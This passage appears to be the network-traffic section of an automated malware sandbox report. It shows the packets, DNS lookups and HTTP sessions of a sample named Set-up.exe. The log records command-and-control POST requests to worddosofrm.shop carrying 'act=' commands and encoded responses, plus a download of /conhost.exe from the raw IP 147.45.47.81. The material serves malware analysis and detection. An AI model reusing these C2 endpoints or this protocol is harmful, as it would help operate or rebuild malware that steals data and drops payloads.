                                                                                                                                Nov 7, 2024 17:39:22.807796955 CET44349734104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:22.807954073 CET44349734104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:22.807997942 CET49734443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:22.808005095 CET44349734104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:22.809600115 CET49734443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:22.924809933 CET44349734104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:22.924890995 CET44349734104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:22.924918890 CET44349734104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:22.924973965 CET49734443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:22.924984932 CET44349734104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:22.925023079 CET44349734104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:22.925082922 CET49734443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:22.925359964 CET49734443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:22.925379038 CET44349734104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:22.925403118 CET49734443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:22.925407887 CET44349734104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:23.158973932 CET49736443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:23.159014940 CET44349736104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:23.159197092 CET49736443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:23.159544945 CET49736443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:23.159558058 CET44349736104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:23.780294895 CET44349736104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:23.780419111 CET49736443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:23.789036036 CET49736443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:23.789056063 CET44349736104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:23.789308071 CET44349736104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:23.801664114 CET49736443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:23.802057981 CET49736443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:23.802084923 CET44349736104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:23.802150011 CET49736443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:23.802160025 CET44349736104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:24.470354080 CET44349736104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:24.470458984 CET44349736104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:24.470514059 CET49736443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:24.470726013 CET49736443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:24.470741034 CET44349736104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:24.574593067 CET49740443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:24.574656963 CET44349740104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:24.574749947 CET49740443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:24.575138092 CET49740443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:24.575150967 CET44349740104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:25.178898096 CET44349740104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:25.179012060 CET49740443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:25.180401087 CET49740443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:25.180414915 CET44349740104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:25.180685997 CET44349740104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:25.188246012 CET49740443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:25.188389063 CET49740443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:25.188417912 CET44349740104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:25.967499971 CET44349740104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:25.967626095 CET44349740104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:25.967910051 CET49740443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:25.968039036 CET49740443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:25.968071938 CET44349740104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:26.221792936 CET49742443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:26.221854925 CET44349742104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:26.221951008 CET49742443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:26.222233057 CET49742443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:26.222246885 CET44349742104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:26.832410097 CET44349742104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:26.832488060 CET49742443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:26.836056948 CET49742443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:26.836082935 CET44349742104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:26.836405039 CET44349742104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:26.848742008 CET49742443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:26.848858118 CET49742443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:26.848923922 CET44349742104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:26.849001884 CET49742443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:26.849014997 CET44349742104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:27.636356115 CET44349742104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:27.636460066 CET44349742104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:27.636511087 CET49742443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:27.636693954 CET49742443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:27.636715889 CET44349742104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:28.116655111 CET49744443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:28.116720915 CET44349744104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:28.116831064 CET49744443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:28.117186069 CET49744443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:28.117204905 CET44349744104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:28.749905109 CET44349744104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:28.750013113 CET49744443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:28.751543045 CET49744443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:28.751550913 CET44349744104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:28.751818895 CET44349744104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:28.760822058 CET49744443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:28.760932922 CET49744443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:28.760961056 CET44349744104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:29.512269020 CET44349744104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:29.512367964 CET44349744104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:29.512506008 CET49744443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:29.512715101 CET49744443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:29.512732029 CET44349744104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:29.620268106 CET49745443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:29.620337009 CET44349745104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:29.620435953 CET49745443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:29.620857000 CET49745443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:29.620874882 CET44349745104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:30.232481003 CET44349745104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:30.232630968 CET49745443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:30.234899998 CET49745443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:30.234910965 CET44349745104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:30.235193014 CET44349745104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:30.236767054 CET49745443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:30.236938953 CET49745443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:30.236959934 CET44349745104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:30.721298933 CET44349745104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:30.721395016 CET44349745104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:30.721544027 CET49745443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:30.730154991 CET49745443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:30.730180979 CET44349745104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:31.370101929 CET49746443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:31.370148897 CET44349746104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:31.370235920 CET49746443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:31.370573997 CET49746443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:31.370583057 CET44349746104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:31.980511904 CET44349746104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:31.980700016 CET49746443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:31.982382059 CET49746443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:31.982391119 CET44349746104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:31.982645035 CET44349746104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:31.987421036 CET49746443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:31.987523079 CET49746443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:31.987529039 CET44349746104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:32.725061893 CET44349746104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:32.725173950 CET44349746104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:32.725271940 CET49746443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:32.725466013 CET49746443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:32.725481987 CET44349746104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:32.793461084 CET49747443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:32.793500900 CET44349747104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:32.793586969 CET49747443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:32.793910027 CET49747443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:32.793921947 CET44349747104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:33.401932955 CET44349747104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:33.402163982 CET49747443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:33.403409004 CET49747443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:33.403417110 CET44349747104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:33.403704882 CET44349747104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:33.404864073 CET49747443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:33.404939890 CET49747443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:33.404944897 CET44349747104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:34.392986059 CET44349747104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:34.393088102 CET44349747104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:34.393147945 CET49747443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:34.393305063 CET49747443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:34.393320084 CET44349747104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:34.421556950 CET49748443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:34.421585083 CET44349748104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:34.421684027 CET49748443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:34.422008038 CET49748443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:34.422019005 CET44349748104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:35.031039953 CET44349748104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:35.031255007 CET49748443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:35.033224106 CET49748443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:35.033240080 CET44349748104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:35.033525944 CET44349748104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:35.034718990 CET49748443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:35.034750938 CET49748443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:35.034790993 CET44349748104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:35.377079964 CET44349748104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:35.377171040 CET44349748104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:35.377229929 CET49748443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:35.377371073 CET49748443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:35.377393961 CET44349748104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:35.377405882 CET49748443192.168.2.4104.21.16.142
                                                                                                                                Nov 7, 2024 17:39:35.377412081 CET44349748104.21.16.142192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:35.378597975 CET4974980192.168.2.4147.45.47.81
                                                                                                                                Nov 7, 2024 17:39:35.383404970 CET8049749147.45.47.81192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:35.383521080 CET4974980192.168.2.4147.45.47.81
                                                                                                                                Nov 7, 2024 17:39:35.388577938 CET4974980192.168.2.4147.45.47.81
                                                                                                                                Nov 7, 2024 17:39:35.393444061 CET8049749147.45.47.81192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:43.885170937 CET8049749147.45.47.81192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:43.885242939 CET4974980192.168.2.4147.45.47.81
                                                                                                                                Nov 7, 2024 17:39:43.885374069 CET4974980192.168.2.4147.45.47.81
                                                                                                                                Nov 7, 2024 17:39:43.890207052 CET8049749147.45.47.81192.168.2.4

                                                                                                                                UDP Packets

                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                Nov 7, 2024 17:39:19.841911077 CET5476053192.168.2.41.1.1.1
                                                                                                                                Nov 7, 2024 17:39:19.865122080 CET53547601.1.1.1192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:19.871747971 CET5710853192.168.2.41.1.1.1
                                                                                                                                Nov 7, 2024 17:39:19.882040024 CET53571081.1.1.1192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:39.962527990 CET5363789162.159.36.2192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:40.602502108 CET6360553192.168.2.41.1.1.1
                                                                                                                                Nov 7, 2024 17:39:40.648552895 CET53636051.1.1.1192.168.2.4
                                                                                                                                Nov 7, 2024 17:39:42.382181883 CET5341653192.168.2.41.1.1.1
                                                                                                                                Nov 7, 2024 17:39:42.392796040 CET53534161.1.1.1192.168.2.4

                                                                                                                                DNS Queries

                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                Nov 7, 2024 17:39:19.841911077 CET192.168.2.41.1.1.10x1694Standard query (0)corehairydu.icuA (IP address)IN (0x0001)false
                                                                                                                                Nov 7, 2024 17:39:19.871747971 CET192.168.2.41.1.1.10xbeaStandard query (0)worddosofrm.shopA (IP address)IN (0x0001)false
                                                                                                                                Nov 7, 2024 17:39:40.602502108 CET192.168.2.41.1.1.10xecf5Standard query (0)18.31.95.13.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                                                                                Nov 7, 2024 17:39:42.382181883 CET192.168.2.41.1.1.10xaf8bStandard query (0)50.23.12.20.in-addr.arpaPTR (Pointer record)IN (0x0001)false

                                                                                                                                DNS Answers

                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                Nov 7, 2024 17:39:19.865122080 CET1.1.1.1192.168.2.40x1694Name error (3)corehairydu.icunonenoneA (IP address)IN (0x0001)false
                                                                                                                                Nov 7, 2024 17:39:19.882040024 CET1.1.1.1192.168.2.40xbeaNo error (0)worddosofrm.shop104.21.16.142A (IP address)IN (0x0001)false
                                                                                                                                Nov 7, 2024 17:39:19.882040024 CET1.1.1.1192.168.2.40xbeaNo error (0)worddosofrm.shop172.67.212.246A (IP address)IN (0x0001)false
                                                                                                                                Nov 7, 2024 17:39:40.648552895 CET1.1.1.1192.168.2.40xecf5Name error (3)18.31.95.13.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                                                                                Nov 7, 2024 17:39:42.392796040 CET1.1.1.1192.168.2.40xaf8bName error (3)50.23.12.20.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false

                                                                                                                                HTTP Request Dependency Graph

                                                                                                                                • worddosofrm.shop
                                                                                                                                • 147.45.47.81

                                                                                                                                HTTP Packets

                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                0192.168.2.449749147.45.47.81806544C:\Users\user\Desktop\Set-up.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Nov 7, 2024 17:39:35.388577938 CET198OUTGET /conhost.exe HTTP/1.1
                                                                                                                                Connection: Keep-Alive
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                Host: 147.45.47.81


                                                                                                                                HTTPS Proxied Packets

                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                0192.168.2.449733104.21.16.1424436544C:\Users\user\Desktop\Set-up.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-11-07 16:39:20 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                Content-Length: 8
                                                                                                                                Host: worddosofrm.shop
                                                                                                                                2024-11-07 16:39:20 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                Data Ascii: act=life
                                                                                                                                2024-11-07 16:39:21 UTC1013INHTTP/1.1 200 OK
                                                                                                                                Date: Thu, 07 Nov 2024 16:39:20 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                Set-Cookie: PHPSESSID=uhb52sa7ena69ggj8o0ngb8sg1; expires=Mon, 03-Mar-2025 10:25:59 GMT; Max-Age=9999999; path=/
                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n%2B3Pl2X1CmqhnlELnnpgl8HqGJ8SMD13Qhsr1%2FOtx1rT5D9wJmL3OArs0XtL6ubvt5U%2FOBTeJwHw%2FnVvvqv%2BiaoA%2FLdSs08oAqr8BS5yd8ErH5X5ybKmB8CjbJ9j0E6zF2EN"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8deec241fd752c8f-DFW
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1481&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=907&delivery_rate=1901510&cwnd=251&unsent_bytes=0&cid=4e3e7637e99a2a18&ts=549&x=0"
                                                                                                                                2024-11-07 16:39:21 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                Data Ascii: 2ok
                                                                                                                                2024-11-07 16:39:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                1192.168.2.449734104.21.16.1424436544C:\Users\user\Desktop\Set-up.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-11-07 16:39:22 UTC264OUTPOST /api HTTP/1.1
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                Content-Length: 82
                                                                                                                                Host: worddosofrm.shop
                                                                                                                                2024-11-07 16:39:22 UTC82OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 42 56 6e 55 71 6f 2d 2d 40 61 62 6f 62 61 34 35 26 6a 3d 37 63 32 36 33 33 35 37 64 30 34 61 66 66 34 37 33 63 62 32 65 64 61 38 61 34 32 66 66 30 33 33
                                                                                                                                Data Ascii: act=recive_message&ver=4.0&lid=BVnUqo--@aboba45&j=7c263357d04aff473cb2eda8a42ff033
                                                                                                                                2024-11-07 16:39:22 UTC1006INHTTP/1.1 200 OK
                                                                                                                                Date: Thu, 07 Nov 2024 16:39:22 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                Set-Cookie: PHPSESSID=v4a07rl1dhijgfq4faeh88jj67; expires=Mon, 03-Mar-2025 10:26:01 GMT; Max-Age=9999999; path=/
                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0wVVgqhgclZa2O8hWlPPCClnH2i1LeAHI9706R6eYQYFBuJTYVlSVJ54TYs3xaNaL7qTm8ykAf5yoG9%2BLwFei4CYTU2oiaizRECDimwHVAg2AWlaSlSI%2Bc40%2FTPqLf7BTdQC"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8deec24bdfcae755-DEN
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=18819&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2840&recv_bytes=982&delivery_rate=153503&cwnd=32&unsent_bytes=0&cid=5a6037d570dfce51&ts=677&x=0"
                                                                                                                                2024-11-07 16:39:22 UTC363INData Raw: 63 64 39 0d 0a 2b 68 75 47 64 73 52 35 6f 44 4e 30 4f 73 72 56 6c 50 73 49 78 35 48 65 4f 30 79 50 64 2b 6f 44 55 63 67 68 2b 6e 53 4e 33 7a 4b 42 4f 66 42 55 2f 6b 32 4d 45 51 64 66 36 4f 2f 79 6d 6d 53 30 39 50 49 5a 4c 65 74 56 30 47 55 77 70 46 4b 66 57 4b 2b 70 58 39 67 68 34 42 65 6f 43 73 55 66 56 6c 2b 79 39 36 36 67 63 2b 58 30 73 42 6c 32 72 52 4b 41 59 54 43 6b 51 35 73 66 34 71 39 65 6d 58 50 71 45 61 77 63 77 31 63 56 56 71 65 77 38 5a 35 70 72 66 2b 33 56 69 54 69 56 63 59 68 4e 4c 49 44 77 46 62 41 75 6b 61 62 56 75 63 46 72 31 76 64 48 77 38 59 72 37 75 32 77 53 71 6d 39 4c 78 58 4b 75 73 63 67 6d 73 35 72 45 4b 65 48 76 32 32 56 4a 4a 7a 35 42 4b 74 46 73 70 44 47 46 79 67 75 2f 65 55 61 65 57 39 2f 46 34 32 72 55 33 49 4d 67 47 70 55 6f
                                                                                                                                Data Ascii: cd9+huGdsR5oDN0OsrVlPsIx5HeO0yPd+oDUcgh+nSN3zKBOfBU/k2MEQdf6O/ymmS09PIZLetV0GUwpFKfWK+pX9gh4BeoCsUfVl+y966gc+X0sBl2rRKAYTCkQ5sf4q9emXPqEawcw1cVVqew8Z5prf+3ViTiVcYhNLIDwFbAukabVucFr1vdHw8Yr7u2wSqm9LxXKuscgms5rEKeHv22VJJz5BKtFspDGFygu/eUaeW9/F42rU3IMgGpUo
                                                                                                                                2024-11-07 16:39:22 UTC1369INData Raw: 4f 4c 59 61 7a 2b 73 56 6b 6a 35 78 71 4c 59 54 53 67 53 5a 63 63 36 37 42 64 6e 6e 6e 6b 56 4f 68 62 78 55 6c 57 41 4f 69 55 38 34 6c 74 71 65 58 2b 59 32 37 79 57 35 45 68 4e 4b 59 44 77 46 62 6e 75 46 4f 62 63 75 73 58 72 68 44 51 55 51 52 65 70 62 4c 6b 6e 32 2b 72 2b 62 39 4c 4a 4f 4d 54 69 32 67 34 6f 30 61 66 45 71 2f 7a 45 4a 39 68 70 45 7a 6d 4f 73 39 61 47 6c 4b 2f 74 37 61 47 4a 4c 79 7a 75 31 56 75 74 56 57 4d 59 44 65 72 52 35 59 59 36 37 46 57 6c 6e 54 72 45 71 77 62 78 56 73 65 55 4b 6d 36 2f 5a 5a 71 6f 50 36 34 58 79 4c 73 45 4d 67 76 63 36 31 62 32 45 36 76 6b 31 65 62 61 36 59 68 70 52 58 4d 56 67 41 59 74 2f 6e 76 32 57 32 70 73 2b 51 5a 49 4f 67 61 6d 6d 41 68 72 30 32 4b 47 75 71 37 58 5a 74 33 35 42 47 68 46 73 78 58 45 56 75 67 73
                                                                                                                                Data Ascii: OLYaz+sVkj5xqLYTSgSZcc67BdnnnkVOhbxUlWAOiU84ltqeX+Y27yW5EhNKYDwFbnuFObcusXrhDQUQRepbLkn2+r+b9LJOMTi2g4o0afEq/zEJ9hpEzmOs9aGlK/t7aGJLyzu1VutVWMYDerR5YY67FWlnTrEqwbxVseUKm6/ZZqoP64XyLsEMgvc61b2E6vk1eba6YhpRXMVgAYt/nv2W2ps+QZIOgammAhr02KGuq7XZt35BGhFsxXEVugs
